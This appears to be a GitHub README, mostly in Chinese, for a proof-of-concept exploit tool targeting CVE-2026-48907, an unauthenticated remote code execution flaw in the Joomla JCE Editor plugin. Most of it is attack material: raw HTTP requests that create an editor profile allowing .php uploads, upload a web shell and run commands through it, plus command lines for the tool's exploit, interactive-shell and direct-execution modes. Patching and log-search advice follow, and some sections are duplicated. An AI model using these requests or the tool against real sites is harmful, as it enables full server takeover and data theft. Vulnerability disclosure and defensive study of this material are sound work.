amnsecurity/CVE-2026-48907-Joomla-JCE-RCE

GitHub: amnsecurity/CVE-2026-48907-Joomla-JCE-RCE

该工具针对 Joomla JCE Editor 插件的未授权远程代码执行漏洞(CVE-2026-48907)提供了 PoC 验证与深入的技术分析。

Stars: 1 | Forks: 0

# ─── CVE-2026-48907 ─── CVSS 9.8
# 🏴 AMN SECURITY 🏴 ### 网络安全研究中心 | Cyber Security Research Center [![网站](https://img.shields.io/badge/Website-amn.amnoffsec.workers.dev-00FF00?style=for-the-badge&logo=googlechrome&logoColor=white)](https://amn.amnoffsec.workers.dev/) [![Instagram](https://img.shields.io/badge/Instagram-@ixctw-E4405F?style=for-the-badge&logo=instagram&logoColor=white)](https://www.instagram.com/ixctw) [![邮箱](https://img.shields.io/badge/Email-ayman.mahmoudoffsec%40gmail.com-D14836?style=for-the-badge&logo=gmail&logoColor=white)](mailto:ayman.mahmoudoffsec@gmail.com)

# ⚠️ Joomla JCE Editor 插件远程代码执行漏洞 ### CVE-2026-48907 | CVSS 9.8 | 严重 (CRITICAL) ### 📋 执行摘要 **Joomla** 内容管理系统(CMS)的 **JCE Editor**(JCE — Joomla Content Editor)插件中存在一个非常严重的安全漏洞,允许未经身份验证的攻击者(无需登录)创建新的编辑器配置文件,最终导致在目标服务器上传并执行恶意 PHP 代码。 该漏洞的评级为 **CVSS 9.8 (Critical)**,允许在无需任何事先权限的情况下完全接管 Joomla 网站。该漏洞已在 **Joomla 5.1.6** 和 **Joomla 4.4.11** 版本中修复。 | 项目 | 详情 | |--------|----------| | **CVE** | CVE-2026-48907 | | **CVSS v3.1** | 9.8 (Critical) | | **向量** | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | | **类型** | Unauthenticated Remote Code Execution | | **产品** | Joomla! CMS (JCE Editor 插件) | | **受影响版本** | Joomla 4.x < 4.4.11, Joomla 5.x < 5.1.6 | | **修复版本** | Joomla 4.4.11 / Joomla 5.1.6 | | **利用链** | JCE Editor → 创建配置文件 → 上传 PHP | | **影响** | 完全接管服务器 | ### 🔍 漏洞详情 该漏洞利用了 JCE 插件中的编辑器配置文件创建机制。该插件允许用户创建新的配置文件,但由于没有进行适当的权限检查,甚至未注册的用户也可以创建自定义配置文件。 核心问题是这些配置文件允许指定**允许上传的文件扩展名**和**文件上传**设置。攻击者可以利用这一点上传恶意 PHP 文件。 #### 漏洞利用流程 ``` [مهاجم غير مُصادق] │ ▼ 1. إنشاء ملف تعريف محرر جديد (Editor Profile) عبر API │ ▼ 2. تعديل إعدادات رفع الملفات في ملف التعريف • إضافة امتداد .php إلى قائمة الامتدادات المسموح بها │ ▼ 3. رفع ملف PHP ضار (Web Shell) عبر المحرر │ ▼ 4. الوصول إلى Web Shell → تنفيذ أوامر عشوائية │ ▼ 5. ✅ استيلاء كامل على موقع Joomla والخادم ``` #### 受影响的组件 | 组件 | 功能 | |--------|---------| | **JCE Editor Plugin** | Joomla 的高级编辑器插件 | | **Editor Profile Manager** | 编辑器配置文件管理器 | | **File Upload Handler** | 编辑器中的文件上传处理器 | | **Media Manager** | Joomla 的媒体管理器 | ### ⚙️ 漏洞利用机制详解 #### 步骤 1:创建恶意编辑器配置文件 攻击者向创建编辑器配置文件的 endpoint 发送 HTTP 请求。由于没有身份验证,配置文件被成功创建。 ``` POST /index.php?option=com_jce&task=profile.save HTTP/1.1 Host: target-joomla.com Content-Type: application/x-www-form-urlencoded name=MaliciousProfile &type=user &plugins[upload][allowed]=jpg,png,gif,php &plugins[upload][maxsize]=10000000 ``` #### 步骤 2:上传 Web Shell 创建配置文件后,攻击者可以利用它上传恶意 PHP 文件: ``` POST /index.php?option=com_jce&task=upload&profile=MaliciousProfile HTTP/1.1 Host: target-joomla.com Content-Type: multipart/form-data --boundary Content-Disposition: form-data; name="file"; filename="shell.php" --boundary-- ``` #### 步骤 3:执行命令 ``` GET /media/com_jce/shell.php?cmd=id HTTP/1.1 Host: target-joomla.com → uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` ### 🖥️ 工具使用 ``` # 目标扫描 python3 CVE-2026-48907.py -t https://target-joomla.com --check # 利用 Web Shell 上传进行完整利用 python3 CVE-2026-48907.py -t https://target-joomla.com --exploit -o shell.php # 交互式 shell 模式 python3 CVE-2026-48907.py -t https://target-joomla.com --interactive # 通过代理 python3 CVE-2026-48907.py -t https://target-joomla.com --proxy http://127.0.0.1:8080 # 直接命令执行 python3 CVE-2026-48907.py -t https://target-joomla.com -c "whoami && id" ``` #### 可用选项 | 选项 | 描述 | |--------|-------| | `-t, --target` | 目标 Joomla 网站的 URL | | `--check` | 仅检查漏洞是否存在 | | `--exploit` | 利用漏洞并上传 Web Shell | | `-o, --output` | 输出的 Web Shell 文件名 | | `--interactive` | 交互式 shell 模式 | | `-c, --command` | 直接执行命令 | | `--proxy` | 用于调试的 HTTP 代理 | | `--profile-name` | 配置文件名称(可选) | | `--verbose, -v` | 显示详细输出 | ### 🛡️ 修复措施 | 措施 | 优先级 | 描述 | |---------|----------|-------| | **更新 Joomla** | 🟢 立即 | 将 Joomla 更新至 5.1.6 或 4.4.11 | | **禁用 JCE Editor** | 🟢 暂时 | 在更新之前禁用该插件 | | **审计配置文件** | 🟡 重要 | 审查并删除任何未经授权的配置文件 | | **扫描上传的文件** | 🟡 重要 | 在 media/com_jce/ 中搜索恶意 PHP 文件 | | **审查日志** | 🔵 持续 | 审查服务器日志以寻找可疑活动 | #### 快速检查命令 ``` # 搜索 web shell find /var/www/html -name "*.php" -newer /var/www/html/configuration.php # 扫描日志 grep -r "com_jce" /var/log/apache2/access.log | grep -i "shell\|cmd\|system" # 检查版本 grep -r "JCE" /var/www/html/administrator/manifests/files/joomla.xml ``` ### 📊 影响评估 | 领域 | 影响 | |--------|---------| | **机密性** | 🔴 完全破坏 — 可以读取所有数据 | | **完整性** | 🔴 完全破坏 — 可以修改所有数据 | | **可用性** | 🔴 完全破坏 — 可以使网站瘫痪 | | **利用难度** | 🟢 低 — 不需要权限或高级知识 | | **攻击检测** | 🟡 中等 — 可以在日志中检测到 | ### 🔗 参考链接 - **NVD**: https://nvd.nist.gov/vuln/detail/CVE-2026-48907 - **Joomla Release**: https://www.joomla.org/announcements/release-news/5894-joomla-5-1-6-and-joomla-4-4-11-security-fixes.html - **JCE Editor**: https://www.joomlacontenteditor.net/ - **CWE-94**: Improper Control of Generation of Code (Code Injection) ### 🔗 联系 AMN SECURITY [![网站](https://img.shields.io/badge/Website-amn.amnoffsec.workers.dev-00FF00?style=for-the-badge&logo=googlechrome&logoColor=white)](https://amn.amnoffsec.workers.dev/) [![Instagram](https://img.shields.io/badge/Instagram-@ixctw-E4405F?style=for-the-badge&logo=instagram&logoColor=white)](https://www.instagram.com/ixctw) [![邮箱](https://img.shields.io/badge/Email-ayman.mahmoudoffsec%40gmail.com-D14836?style=for-the-badge&logo=gmail&logoColor=white)](mailto:ayman.mahmoudoffsec@gmail.com)

# ⚠️ CVE-2026-48907 — Joomla JCE Editor 未授权远程代码执行 ### CVSS 9.8 | 严重 | 远程代码执行 ### 执行摘要 **CVE-2026-48907** 是 **Joomla CMS** 的 **JCE Editor** 插件中存在的一个严重的未授权远程代码执行 (RCE) 漏洞。此漏洞允许没有任何身份验证的攻击者创建新的编辑器配置文件,并最终在目标服务器上传和执行任意 PHP 代码。 该漏洞的 **CVSS 评分为 9.8 (严重)**,允许完全接管 Joomla 网站。该漏洞已在 **Joomla 5.1.6** 和 **Joomla 4.4.11** 中修复。 | 字段 | 值 | |-------|-------| | **CVE** | CVE-2026-48907 | | **CVSS v3.1** | 9.8 (Critical) | | **向量** | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | | **类型** | 未授权远程代码执行 | | **产品** | Joomla CMS (JCE Editor 插件) | | **受影响版本** | Joomla 4.x < 4.4.11, Joomla 5.x < 5.1.6 | | **修复版本** | Joomla 4.4.11 / Joomla 5.1.6 | | **影响** | 完全接管服务器 | ### 漏洞详情 该漏洞存在于 **JCE Editor 的配置文件创建功能**中。该插件暴露了一个 API endpoint,允许在没有适当身份验证检查的情况下创建编辑器配置文件。攻击者可以: 1. **创建具有文件上传权限的恶意编辑器配置文件** 2. **将 PHP 扩展名添加**到允许上传的列表中 3. **通过编辑器的文件上传处理器上传 PHP web shell** 4. **在目标服务器上执行任意命令** #### 漏洞利用流程 ``` [Unauthenticated Attacker] │ ▼ 1. Create Editor Profile via JCE API │ ▼ 2. Modify upload settings to allow .php files │ ▼ 3. Upload malicious PHP web shell │ ▼ 4. Access shell → execute OS commands │ ▼ 5. ✅ Full Joomla site compromise ``` ### 工具使用 ``` # 检查漏洞 python3 CVE-2026-48907.py -t https://target-joomla.com --check # 利用 Web Shell 上传进行完整利用 python3 CVE-2026-48907.py -t https://target-joomla.com --exploit -o shell.php # 交互式 shell 模式 python3 CVE-2026-48907.py -t https://target-joomla.com --interactive # 通过代理 python3 CVE-2026-48907.py -t https://target-joomla.com --proxy http://127.0.0.1:8080 # 直接命令执行 python3 CVE-2026-48907.py -t https://target-joomla.com -c "whoami && id" ``` ### 修复措施 | 措施 | 优先级 | 描述 | |--------|----------|-------------| | **更新 Joomla** | 🔴 立即 | 更新至 Joomla 5.1.6 或 4.4.11 | | **禁用 JCE Editor** | 🔴 临时 | 在修复之前禁用该插件 | | **审计配置文件** | 🟡 重要 | 审查并删除未经授权的配置文件 | | **扫描上传文件** | 🟡 重要 | 检查恶意 PHP 文件 | ### 影响评估 | 领域 | 影响 | |--------|--------| | **机密性** | 🔴 完全破坏 — 所有数据均可读取 | | **完整性** | 🔴 完全破坏 — 所有数据均可修改 | | **可用性** | 🔴 完全破坏 — 网站可被下线 | | **利用复杂性** | 🟢 低 — 无需身份验证或特殊知识 | ### 参考链接 - **NVD**: https://nvd.nist.gov/vuln/detail/CVE-2026-48907 - **Joomla Announcement**: https://www.joomla.org/announcements/release-news/5894-joomla-5-1-6-and-joomla-4-4-11-security-fixes.html - **CWE-94**: 代码生成控制不当 ### 联系 AMN SECURITY 🌐 **网站**: https://amn.amnoffsec.workers.dev/ 📸 **Instagram**: https://www.instagram.com/ixctw 📧 **邮箱**: ayman.mahmoudoffsec@gmail.com
标签:CISA项目, Joomla, OpenVAS, PHP, PoC, Web安全, 安全漏洞, 暴力破解, 编程工具, 蓝队分析, 远程代码执行, 逆向工具